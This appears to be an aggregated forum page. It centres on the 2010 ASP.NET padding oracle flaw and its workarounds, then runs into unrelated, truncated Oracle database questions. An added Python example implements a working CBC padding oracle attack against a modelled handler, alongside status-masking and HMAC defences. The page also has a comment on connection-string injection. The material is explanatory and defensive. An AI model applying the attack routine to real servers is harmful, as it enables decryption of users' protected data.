Alleged Padding Oracle vulnerability in ASP.NET

Posted Date: September 18, 2010    Category: ASP.Net
Can anybody direct me to an official response from Microsoft to the recently identified, and highly exaggerated and sensationalised, Padding Oracle / AES cookie encryption vulnerability which allegedly affects various platforms including Java, Ruby on Rails, and ASP.NET? http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310

As far as I can tell, this issue is not as serious on any of the affected platforms as the regurgitated suggestions in the hyped articles seem to imply. Data is only compromised if developers are careless enough to . And despite all the headlines mentioning banking and singling out ASP.NET, websites where security is that important should all be using HTTPS.

One highly sensationalised headline and article about this, which only mentioned ASP.NET, has been picked up, distributed and repeated prolifically. Sensationalist hype is a good way to get people to click on and share a link to your website. However, as fun and trendy as it may be to try to find reasons to criticise Microsoft technology, it is also dangerous and irresponsible when doing so overlooks or neglects to mention other platforms affected by the same type of vulnerability. Nevertheless, it's reassuring to know that potential issues in MS technology are quickly flagged and hard to miss, because they attract so much publicity.


More Related Resource Links

HOWTO: Verify that custom error handling solutions do not expose padding oracle


I've done some digging and come up with what I think is useful information for you if you have a custom error handling solution in place instead of, or as well as, the usual ASP.NET <customErrors> stuff.

From comments on ScottGu's post, it seems that the main suspect for the actual padding oracle is WebResource.axd (possibly other .axd handlers too).

  • If you look in .NET Reflector at the IHttpHandler.ProcessRequest method in System.Web.Handlers.AssemblyResourceLoader, there's a call to Page.DecryptString early on.
  • This is the thing that will cause an HTTP 500 status to be returned if it fails, e.g. if the padding etc. in Request.QueryString["d"] is invalid.
  • If the attacker manages to get the padding right, then it continues on, ultimately calling throw new HttpException(404...).

It's this differentiation, padding correct (404) versus incorrect (500), that is at the root of the exploit: the padding oracle.

If your error handling returns exactly the same response for both, it masks the oracle. To test whether you're vulnerable externally, a simple test is to request both:

  • webresource.axd?d=foo
  • webre

Need help implementing the workaround for the oracle padding exploit


Moved from the MVC forum to the dedicated one about the vulnerability by moderator XIII, to keep people and the ASP.NET team at Microsoft focused on one reporting area:

I'm trying to implement the workaround for the oracle padding exploit described on ScottGu's blog.  Here's the workaround:

<customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="/Home/ErrorPage" />

When I add that to my web.config, I'm not redirected to the error page when I try a bogus URL.  I get the regular 404 error page.  That's not what I expected.  When I visit http://www.example.com/Home/ErrorPage, I can see it just fine.

I can't use the script on Scott's page to test my server since I deploy to Az

Possible fix for oracle padding attack ASP.NET 4.0


I've implemented a possible fix for ASP.NET 4.0 by creating a custom crypto algorithm which uses AES + SHA256 hash.

This way it is not easily possible to create new valid requests. The hash function will sort out the majority of the requests as being invalid. Even if the attacker has the machine key, the attacker also needs the secret hash key to encrypt custom data. 

If someone is interested:
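The mechanics the HOWTO post above and this AES + SHA256 post describe, as an added example that is not code from the forum, from Microsoft or from ASP.NET: a hypothetical ResourceHandler that returns the status codes the HOWTO post attributes to WebResource.axd (500 when decryption fails on bad padding, 404 when the decrypted name matches no resource), the "request two variants and compare" check, a padding oracle attack that recovers the d value from those status codes alone, and the two defences discussed in the thread: one status for every failure (what the customErrors workaround aims for) and an HMAC-SHA256 tag verified before anything is decrypted (the AES + SHA256 idea). Assumptions: the block cipher is a toy SHA-256 Feistel network standing in for AES so the example runs with only the standard library, the resource names and tokens are constructed, and the handler models only the status-code behaviour, not the real AssemblyResourceLoader.

```python
"""Added example (not the forum's or ASP.NET's code): the 500-vs-404 oracle the
HOWTO post describes, its external probe, a CBC padding oracle attack driven by
that difference, and the two defences discussed. A 16-byte Feistel network keyed
with SHA-256 stands in for AES; the attack does not depend on the cipher."""
import hashlib
import hmac
import os

BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):  # round function of the toy block cipher
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_cipher(key, blk, decrypt=False):
    """Toy 6-round Feistel block cipher on 16-byte blocks (stand-in for AES)."""
    l, r = blk[:8], blk[8:]
    for rnd in (reversed(range(6)) if decrypt else range(6)):
        l, r = (_xor(r, _f(key, l, rnd)), l) if decrypt else (r, _xor(l, _f(key, r, rnd)))
    return l + r

def pad(data):  # PKCS#7, the scheme behind "Padding is invalid and cannot be removed"
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("Padding is invalid and cannot be removed.")
    return data[:-n]

def cbc(key, iv, data, decrypt=False):
    out, prev = b"", iv
    for i in range(0, len(data), BLOCK):
        blk = data[i:i + BLOCK]
        cur = _xor(block_cipher(key, blk, True), prev) if decrypt else block_cipher(key, _xor(blk, prev))
        out, prev = out + cur, (blk if decrypt else cur)
    return out

class ResourceHandler:
    """Hypothetical model of the handler. Mode 'oracle': 500 on bad padding, 404 on
    an unknown resource (the behaviour the HOWTO post describes). 'masked': 404 for
    both failures (the customErrors workaround). 'mac': verify an HMAC-SHA256 tag
    before decrypting anything (encrypt-then-MAC, the AES + SHA256 approach)."""
    def __init__(self, mode="oracle"):
        self.mode, self.enc_key, self.mac_key = mode, os.urandom(32), os.urandom(32)
        self.resources = {b"WebForms.js", b"Menu.js"}  # constructed sample names

    def protect(self, name):  # builds the value a page would embed in ?d=
        iv = os.urandom(BLOCK)
        tok = iv + cbc(self.enc_key, iv, pad(name))
        if self.mode == "mac":
            tok += hmac.new(self.mac_key, tok, hashlib.sha256).digest()
        return tok

    def handle(self, tok):  # returns the HTTP status for WebResource.axd?d=<tok>
        if self.mode == "mac":
            tok, tag = tok[:-32], tok[-32:]
            if not hmac.compare_digest(hmac.new(self.mac_key, tok, hashlib.sha256).digest(), tag):
                return 404  # a tampered token never reaches the padding check
        try:
            name = unpad(cbc(self.enc_key, tok[:BLOCK], tok[BLOCK:], decrypt=True))
        except ValueError:
            return 404 if self.mode == "masked" else 500
        return 200 if name in self.resources else 404

def probe(handler, tok):
    """The external check the HOWTO post suggests: flip a byte that only corrupts the
    resource name (first IV byte) and one that breaks the padding (last byte); an
    exploitable oracle answers the two requests differently."""
    a, b = bytearray(tok), bytearray(tok)
    a[0] ^= 1
    b[-1] ^= 1
    return handler.handle(bytes(a)), handler.handle(bytes(b))

def attack_block(oracle, prev, target):
    """Recover one plaintext block from status codes alone: a guess is 'padding
    accepted' when its response differs from the common one. If all 256 responses
    are identical the oracle is masked and None is returned."""
    inter = bytearray(BLOCK)  # D_k(target), learned from the last byte backwards
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos
        crafted = bytearray(inter[j] ^ padv if j > pos else 0 for j in range(BLOCK))
        def q(g): return oracle(bytes(crafted[:pos]) + bytes([g]) + bytes(crafted[pos + 1:]) + target)
        seen = {g: q(g) for g in range(256)}
        vals = list(seen.values())
        common = max(set(vals), key=vals.count)
        hits = [g for g, s in seen.items() if s != common]
        if not hits:
            return None
        if len(hits) > 1:  # last byte only: 0x01 versus an accidental 0x02 0x02 (or longer)
            crafted[pos - 1] ^= 0xFF  # breaking the byte before it rules out the longer padding
            hits = [g for g in hits if q(g) != common]
        inter[pos] = hits[0] ^ padv
    return _xor(inter, prev)

def attack(handler, tok):
    """Decrypt a captured ?d= value block by block using only handle()'s status codes."""
    blocks = [tok[i:i + BLOCK] for i in range(0, len(tok), BLOCK)]
    out = b""
    for prev, target in zip(blocks, blocks[1:]):
        blk = attack_block(handler.handle, prev, target)
        if blk is None:
            return None
        out += blk
    return unpad(out)
```

attack(ResourceHandler("oracle"), tok) recovers the plaintext of a freshly issued token with 4096 requests per block (the code always tries all 256 values for each byte); the same call against the "masked" or "mac" handler returns None because every answer is identical. Masking the status code hides only this channel, which is why the error page in the workaround ScottGu published also sleeps for a random interval: response timing can reveal the same "rejected early on padding" difference. A MAC verified before any decryption removes the oracle instead of hiding it, which is what makes the AES + SHA256 approach the stronger fix.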


Need Oracle Data Provider .CS File for Oracle 10g Database connection!



I need a 'Wrapper.cs' file which takes care of the database connection (Oracle 10g), where I can just call the method with my SQL query:

Gridview1.DataSource = SampleWrapper.ExecuteDatatable("THE SQL QUERY");

Please post the link if there is any open source!

ASP.Net connect to Oracle.


We have an application which uses 'System.Data.OracleClient'. On the box it was developed on, we can change the TNSNAMES.ORA entries to connect to different Oracle databases. After moving the code to a Microsoft Server 2008 box, it would appear that the application ignores the TNSNAMES.ORA file. It has cached the first Oracle connection and will now work without any TNSNAMES.ORA file. Where is it getting the connection from? We have set TNS_ADMIN to point at the TNSNAMES.ORA file. We can tnsping the connection OK.

access Oracle database


Pre-.NET Framework 4.0 supported using Oracle.DataAccess.Client, using Oracle.DataAccess.Types, System.Data.OracleClient, OracleDataReader, OracleConnection. What are the equivalents in .NET Framework 4.0? Does it require any download?

Thank you.

Trying to run a stored procedure from vb code with oracle data provider.



Here is my SP:

create or replace
 Open p_getuserssignon_recordset1 for
 SELECT Distinct(Userid), UserPassword, SecurityLevel, ActiveStatus
WHERE substr(UserId,1,2) <> vUid
Order By UserId;

I would like to run this SP from code and fill a gridview with the result. 

I am not sure how to go about this, as I have found several different examples, other than the one I  think I need.

I am using the oracle data provider and I have an input parameter (vUid, which will equal "zz").

First question. When filling a gridview with a result set from a stored procedure should the recordset OUT be defined as a REFCURSOR (like i did above)? 


Do you have example code as to how to execute the SP and fill a gridview?  I keep trying different variations of code i've found on the internet without any success other than getting more confused.

(I am using VS 2005, VB).

Thank you.



WebResource.axd - Padding is invalid and cannot be removed error



I'm working on a site that is hosted externally, and the admin just sent me an email saying they're getting the following error:

Event code: 3005
Event message: An unhandled exception has occurred.
Event time: 11/17/2008 8:11:24 AM
Event time (UTC): 11/17/2008 8:11:24 AM
Event ID: 5d3b54c09a24463ca8fb03f22692e0bb
Event sequence: 731
Event occurrence: 3
Event detail code: 0

Application information:
Application domain: /LM/W3SVC/1776482879/ROOT-1-128713348984007217
Trust level: Full
Application Virtual Path: /
Application Path: D:\....
Machine name: ****

Process information:
Process ID: 2272
Process name: w3wp.exe
Account name: ****

Exception information:
Exception type: CryptographicException
Exception message: Padding is invalid and cannot be removed.

Request information:
Request URL: http://sitename/WebResource.axd?d=_O9D297IUE-qcgMP0yFe-w2&t=633468747532779057
Request path: /WebResource.axd
User host address:
Is authenticated: False
Authentication Type:
Thread ac

Linq with two databases (oracle and sql server)


I have a problem bringing the data from Oracle (an external database) and SQL Server together (with similar data). The LINQ entities are linked to each other. The structure is like different countries with different cities and so on. To display these "non-original LINQ objects" I need to put them into entities (linked to each other). Now I add some of them to my SQL database. But for every entity I must check the connections to the other objects I don't want to add, and delete them (otherwise LINQ will add all the connected objects, even those I don't want to add). If this goes wrong the whole input method crashes. Is there any other possibility, apart from checking every single entity and removing unwanted connections, to handle this procedure?
Thanks a lot, preg

DataTable --> Oracle DB



Can someone offer advice on the below? 

I am connecting to an AR Server and pulling out data into a DataSet.  There will be 15 different DataTables within the set.  I would like to find a way to either insert the entire DataSet or each DataTable into an Oracle table.  The Oracle table has the same format as the DataTables I'm creating.

 private void button1_Click(object sender, EventArgs e)
 {
     //Get Credentials
     ID = userNameTextBox.Text;
     PW = passWordTextBox.Text;

     //Connection string. Note: a ';' in the typed password breaks (or injects into) this
     //concatenated string; OdbcConnectionStringBuilder would quote the values safely.
     connString = gstrConnectBaseLineStart + "UID=" + ID + ";PWD=" + PW + gstrConnectBaseLineEnd;
     conn = new OdbcConnection(connString); //Create Connection
     conn.Open(); //Open Connection
     Console.Write("Connection Successful" + "\n");

     dataAdapter = new OdbcDataAdapter(SQL, conn);
     dataAdapter.Fill(IncidentsDataSet, "dataTableTest");

     DataTable dataTable = IncidentsDataSet.Tables["dataTableTest"];

     dataGridView1.DataSource = dataTable;

     //Would like to create som
 }

Connecting to Oracle on 64bit OS

We have a 64-bit implementation of MOSS 2007. I recently installed the SharePoint SDK to use the Application Definition Designer to connect to Oracle. I enter the connection string and then I get this:

Attempt to load Oracle client libraries threw BadImageFormatException. The problem will occur when running in 64 bit mode with the 32 bit Oracle client components installed.

I have verified that the server has the 64-bit version of the Oracle client installed, both the instant client and system.data.oracleclient.dll. The only thing I can think of is that the tool was compiled as a 32-bit application. Is there a 64-bit version available? Is there something else that I'm missing?

"An error occurred while retrieving data from Oracle Instance..."


I have successfully imported the ADF and have also successfully created a Business Data Column. But when I try to query data, I get the following error:

An error occurred while retrieving data from Oracle Instance. Administrator, see the server log for more information

And this is what I found in the Application Logs
A Metadata Exception was constructed in App Domain '/LM/W3SVC/81256521/ROOT-1-129217212004078822'. The full exception text is: LobSystem could not be found using criteria 'id=476'.

Secured Oracle Provider



Ours is an ASP.NET web application. The database is Oracle. It's an Internet application.

The database will be in one location and the web application in another. Data from Oracle to the web application will be passed over the Internet.

We are using Enterprise Library, and the provider is System.Data.OracleClient.

We need a provider which encrypts the data while passing it over the Internet.

Do we need to go for some third-party providers or ODBC?

Please let me know.


What's wrong with MSDAORA.1 (Microsoft OLE DB Provider for Oracle) in SQL2008R2

Dear Gurus, I installed a test SQL 2008 R2 on Windows Server 2008 R2 x64 and installed both the x86 and x64 versions of the Oracle client. I created a new AS database as AS system administrator and then created a new data source with the "Microsoft OLE DB Provider for Oracle" provider. When I test the connection, it succeeds. Then I created the data source view / dimensions / cubes etc. But when I process the database, an error occurs: "Database Access Module Error, Provider 'MSDAORA.1' not register". I followed http://msdn.microsoft.com/en-us/library/ms152516.aspx and changed SQL Server 2008 R2's registry key as the note says, then restarted the server, but it's still the same error! I can process the cube successfully if I change the provider to "Oracle OLE DB Provider". Has MSDAORA become obsolete in SQL Server 2008 R2?

Wilson

Oracle Linked serve Query performance in 2000 vs 2008 R2 64 Bit

Hi everyone. We have started to migrate one of our reporting systems from SQL 2000 to SQL 2008 R2. One of the steps has been to test the performance of certain Oracle linked server queries between each server. We are finding on average 3-fold better performance stats (in terms of query completion time) on the old server. This should obviously not be the case. The new server has significantly more CPU/memory/IO resources to play with, and it is 64-bit (not to mention it's new!). Here's what I've got so far:

Old server: SQL 2000 on W2000, both fully patched. Old Dell dual core with 3 GB of RAM running on two soft IDE mirrored drives (yes I know... it sucks). It's connecting via the MS OLE DB provider for Oracle (9i client).

New server: ESX VMware server with 2 CPUs assigned, 8 GB of RAM, connected to a large HP SAN. CPU, RAM and IOs have all been ruled out as the problem. We've tried varying network cards with different results, so we haven't ruled that out yet. It's connecting via the Oracle provider for OLE DB (11g 64-bit client).

The linked server is an Oracle 9i fully patched server. All three are on the same network backbone. Running a simple select * query on both servers returns the same number of rows (~76 000). It takes ~1:20 on the new server and ~0:20 on the old server. In looking at the wait stati

No Way to retrieve data from oracle ref:_cursor over T-SQL and linked Server?

Hello, for a migration project we want to compare results from SPs from Oracle and SQL Server. The same calls should retrieve the same results. We also want to build an automatic test for this. But is there no way to retrieve results from Oracle SPs with a ref_cursor over a linked server? No one answered this: http://social.msdn.microsoft.com/forums/en-us/sqldataaccess/thread/2BAC6743-8701-4476-8F36-0377A5761525

Greetings, Michael

I am not able to install oracle 10g on windows 7, Please let me know how can I do it or what could b

Dear Concerned, I have really become fed up while using Windows 7. Please let me know how I can install Oracle 10g, and which version of Oracle Windows 7 will accept, so that I could start work on my laptop... Thanks and Regards, Rahul Kishan